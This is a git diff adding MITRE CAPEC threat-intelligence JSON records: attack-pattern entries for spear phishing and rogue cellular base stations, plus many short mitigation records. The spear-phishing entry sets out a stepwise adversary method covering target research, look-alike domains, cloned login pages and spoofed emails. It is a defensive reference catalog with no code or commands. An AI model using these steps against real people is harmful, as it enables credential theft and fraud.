", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json new file mode 100644 index 0000000000000000000000000000000000000000..6f3b9855aee2609c1b8bc02e9a77a2b4b36ae7ca --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json 
@@ -0,0 +1,123 @@ +{ + "id": "bundle--af20cc47-a387-4278-938d-16003b9f7e59", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. 
As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.", + "external_references": [ + { + "external_id": "CAPEC-163", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/163.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + }, + { + "description": "Internal Spearfishing", + "external_id": "T1534", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1534" + }, + { + "description": "Phishing: Spearfishing Attachment", + "external_id": "T1566.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/001" + }, + { + "description": "Phishing: Spearfishing Link", + "external_id": "T1566.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/002" + }, + { + "description": "Phishing: Spearfishing via Service", + "external_id": "T1566.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/003" + }, + { + "description": "Phishing for Information: Spearfishing Service", + "external_id": "T1598.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/001" + }, + { + "description": "Phishing for Information: Spearfishing Attachment", + "external_id": "T1598.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/002" + }, + { + "description": "Phishing for Information: Spearfishing Link", + "external_id": "T1598.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/003" + } + ], + "id": "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Spear Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + 
"x_capec_can_follow_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_child_of_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_consequences": { + "Accountability": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authentication": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authorization": [ + "Gain Privileges (Privilege Escalation)" + ], + "Confidentiality": [ + "Read Data (Information Leakage)" + ], + "Integrity": [ + "Modify Data (Data Modification)" + ], + "Non-Repudiation": [ + "Gain Privileges (Privilege Escalation)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity that happened in a different area from where they live (details might be provided by the spear phishers) and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. 
An adversary has just collected the target's online banking information which can now be used by them to log into the target's bank account and transfer money to a bank account of the adversary's choice.", + "An adversary can leverage a weakness in the SMB protocol by sending the target, an official looking e-mail from their employer's IT Department stating that their system has vulnerable software, which they need to manually patch by accessing an updated version of the software by clicking on a provided link to a network share. Once the link is clicked, the target is directed to an external server controlled by the adversary or to a malicious file on a public access share. The SMB protocol will then attempt to authenticate the target to the adversary controlled server, which allows the adversary to capture the hashed credentials over SMB. These credentials can then be used to execute offline brute force attacks or a \"Pass The Hash\" attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain useful contextual detailed information about the targeted user or organization: An adversary collects useful contextual detailed information about the targeted user or organization in order to craft a more deceptive and enticing message to lure the target into responding.

  2. Techniques
    Conduct web searching research of target. See also: CAPEC-118.
    Identify trusted associates, colleagues and friends of target. See also: CAPEC-118.
    Utilize social engineering attack patterns such as Pretexting. See also: CAPEC-407.
    Collect social information via dumpster diving. See also: CAPEC-406.
    Collect social information via traditional sources. See also: CAPEC-118.
    Collect social information via Non-traditional sources. See also: CAPEC-118.

Experiment

  1. Optional: Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the adversary impersonate the legitimate site more convincingly. The adversary can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate.

  2. Techniques
    Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L).
    Optionally obtain a legitimate SSL certificate for the new domain name.
  3. Optional: Explore legitimate website and create duplicate: An adversary creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that they are trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here.

  4. Techniques
    Use spidering software to get copy of web pages on legitimate site.
    Manually save copies of required web pages from legitimate site.
    Create new web pages that have the legitimate site's look at feel, but contain completely new content.
  5. Optional: Build variants of the website with very specific user information e.g., living area, etc.: Once the adversary has their website which duplicates a legitimate website, they need to build very custom user related information in it. For example, they could create multiple variants of the website which would target different living area users by providing information such as local news, local weather, etc. so that the user believes this is a new feature from the website.

  6. Techniques
    Integrate localized information in the web pages created to duplicate the original website. Those localized information could be dynamically generated based on unique key or IP address of the future victim.

Exploit

  1. Convince user to enter sensitive information on adversary's site.: An adversary sends a message (typically an e-mail) to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to adversary's website) and log in. The key is to get the victim to believe that the message is coming from a legitimate entity trusted by the victim or with which the victim or does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user.

  2. Techniques
    Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link.
    Place phishing link in post to online forum.
  3. Use stolen credentials to log into legitimate site: Once the adversary captures some sensitive information through phishing (login credentials, credit card information, etc.) the adversary can leverage this information. For instance, the adversary can use the victim's login credentials to log into their bank account and transfer money to an account of their choice.

  4. Techniques
    Log in to the legitimate site using another user's supplied credentials.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "None. Any user can be targeted by a Spear Phishing attack." + ], + "x_capec_resources_required": [ + "An adversay must have the ability communicate their phishing scheme to the victims (via email, instance message, etc.), as well as a website or other platform for victims to enter personal information into." + ], + "x_capec_skills_required": { + "Medium": "Spear phishing attacks require specific knowledge of the victims being targeted, such as which bank is being used by the victims, or websites they commonly log into (Google, Facebook, etc)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json new file mode 100644 index 0000000000000000000000000000000000000000..4d927ab329e85065e0324f1524c70fa56d8abe63 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214.json 
@@ -0,0 +1,48 @@ +{ + "id": "bundle--9ee05b1f-b42a-4ca7-bec0-76ac5b10befa", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker imitates a cellular base station with their own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. the retransmission device) to talk to the rogue base station.", + "external_references": [ + { + "external_id": "CAPEC-617", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/617.html" + } + ], + "id": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Rogue Base Station", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control cellular data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json new file mode 100644 index 0000000000000000000000000000000000000000..c30f906ed89682fbb91988d2f5d685c96e8173ed --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--40108958-603d-430e-8863-ab4b842d9499", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.", + "id": "course-of-action--0002fa37-9334-41e2-971a-cc8cab6c00c4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-102-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json new file mode 100644 index 0000000000000000000000000000000000000000..0df5c0c3f7bcb0269c7b3ac0014f0dd083031874 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--c93afaab-2fef-49f2-89ab-0914e853032b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.", + "id": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-120-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json new file mode 100644 index 0000000000000000000000000000000000000000..e584f22f60c3131623895d4d03bda6132df93318 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--78cdfdad-383e-4ecd-8664-81655793a91f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", + "id": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json new file mode 100644 index 0000000000000000000000000000000000000000..4d79d9adb608e4f2aadebe0df7761754356080df --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--77601cc5-db30-402f-864e-43245c9db038", + "objects": [ + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before being stored.", + "id": "course-of-action--00d95d33-0be2-4026-b367-d0b3ca061978", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-592-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json new file mode 100644 index 0000000000000000000000000000000000000000..46214470235b16dc47b91cea4cb35e14a2d710c2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01450422-3bac-46ec-874f-c608fdf422d5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f397a47c-2b51-4f53-9b0c-8e0fba0457ef", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--01450422-3bac-46ec-874f-c608fdf422d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json new file mode 100644 index 0000000000000000000000000000000000000000..42044847b906f9cf434699f8279d15fb3d739a4d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--cd028a71-1f05-4ba7-89c1-9edf69928872", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review generation of security identifiers for design inconsistencies and common weaknesses.", + "id": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json new file mode 100644 index 0000000000000000000000000000000000000000..1a0a0fe2cc636b17ce8aafc535d694e3d4722dde --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--c0d1f313-dccd-45e3-84df-9789fea24306", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.\n ", + "id": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json new file mode 100644 index 0000000000000000000000000000000000000000..57c1476802a44c22fc72a6524add14e51305d9c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--022f6443-4421-4a54-beb6-d471aad577cb.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--0102035e-f40f-43fc-a9cb-afd5801c2a67", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that terminals are only writeable by named owner user and/or administrator", + "id": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-40-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json new file mode 100644 index 0000000000000000000000000000000000000000..250b7098eada48c42c17978b8f568f360f714a2e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--1ab0a6d2-0b68-4617-ac99-23f159411736", + "objects": [ + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal access.", + "id": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json new file mode 100644 index 0000000000000000000000000000000000000000..126b90cb5abea2ef45a972202c482b58568f700c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--031e02fe-84e7-4908-b507-e836876da1ab.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fbc59ac7-fbb7-4207-a90f-a049145abf30", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--038c3205-b918-4a35-84f2-e2293c5939db.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--038c3205-b918-4a35-84f2-e2293c5939db.json new file mode 100644 index 0000000000000000000000000000000000000000..cd3e0696c51eb8ae38c7d0feff106925578f7215 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--038c3205-b918-4a35-84f2-e2293c5939db.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--0d630921-c8ac-42ac-9493-0ec968b86a04", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Follow the principle of least privilege and restrict administrative duties to as few accounts as possible. Ensure these privileged accounts are secured with strong credentials which do not overlap with other network devices.", + "id": "course-of-action--038c3205-b918-4a35-84f2-e2293c5939db", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json new file mode 100644 index 0000000000000000000000000000000000000000..6542c5c03e00955474f79f28924d7d12e0bcee4e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--547d2fc9-53a3-4e10-967c-918bf427020b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json new file mode 100644 index 0000000000000000000000000000000000000000..178d0ae615d21be54df3ce8ddefa32003192a7f3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2dccb8a3-fa75-4091-812d-7898af223236", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize digital signatures to increase authentication assurance.", + "id": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json new file mode 100644 index 0000000000000000000000000000000000000000..46b72d8b8dc872086d430109465f2fa35a5552b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--b6577859-de4b-4fb4-adcc-30508befee9b", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of the device.", + "id": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-626-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json new file mode 100644 index 0000000000000000000000000000000000000000..c7270b098a60acd90f18668b9bf829ec1540786b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--41d43048-7291-464d-829b-2f3627b2dcb7", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse Kerberos service account credentials across systems.", + "id": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
